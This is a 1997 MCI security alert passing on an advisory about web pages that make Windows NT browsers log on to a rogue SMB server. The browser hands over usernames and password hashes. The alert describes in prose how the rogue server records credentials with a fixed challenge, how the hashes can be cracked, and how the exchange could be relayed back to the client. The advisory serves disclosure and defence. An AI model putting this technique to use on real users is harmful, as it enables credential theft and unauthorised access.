MCI Telecommunications internetMCI Security Group Report Title: iMCI MIIGS Security Alert Report Name: SMB NEGOTIATION EXPOSURE Report Number: iMCISE:IMCINTSECURITY:031597:01:P1R1 Report Date: 03/15/97 Report Format: Formal Report Classification: MCI Informational Report Reference: http://www.security.mci.net Report Distribution: iMCI Security, MCI Internal Internet Gateway Security (MIIGS), MCI Emergency Alert LiSt (MEALS) (names on file) -------------------------------------------------------------------------- Alert taken from: http://www.ntshop.net/security/ie3-4.htm ---------------------------------------------------------------------- HTML CAN FORCE AN SMB NEGOTIATION VERSION AFFECTED: Netscape Navigator 3.01 running NT 4.0 Microsoft Internet Explorer 3.01 with Security Patches, running NT 4.0 So far, this has only been confirmed on the following test benches: Windows NT 4.0 Server Service Patch 2 - Internet Explorer 3.01B Windows NT 4.0 Server Service Patch 2 - Netscape Navigator 3.01p Windows NT 4.0 Workstation Service Patch 2 - Internet Explorer 3.01B Windows NT 4.0 Workstation Service Patch 2 - Netscape Navigator 3.01 How it Works: Use a Web page that points to a Rogue SMB Server: This web pages contains an embedded image (actually two). The embedded images do not reside in this same directory as this web page. In fact, they reside on a SMB Lanman server (as opposed to an HTTP server). The modified SMB Server In order for the client to download the images, the client needs to 'logon' to the Lanman server. Windows NT seems to do this without even asking the user for confirmation. Windows NT simply forwards the username and encrypted version of the user's password to the Lanman server. The Lanman server code has been modified slightly to record Usernames and "Hashed Passwords" of the victims. Also the code has been modified to supply the client with a fixed "Challenge seed value" for password encryption. (Thus making it even easier to decode the client passwords in the future.) What's the big deal? First of all, no remote web site should be able to record your username. If they do, then can compile junk email lists and sell your name. Secondly, if they have information on what your password might be, and they know what site you came from, they can gain access to your computer or local account. (Thus compromising your security with you never knowing about it.) It is fairly easy to unencrypt a MS password if the challenge has set to zero via dictionary attacks. Sequential search brute force attacks work as well if you can guess what types of characters are most common in the password. Yes, it is time consuming, but if your account gets hacked, is it really worth it? It is interesting to note that in theory someone could setup a Lanman server that make a simultaneous connection back to the client as a connection comes in. By simply relaying the same challenge and password back to the client, the remote server could gain network access to the vulnerable client. CREDIT: Reported by Aaron Spangler Posted on The NT Shop on March 14, 12 Noon ----------------------------------------------------------------------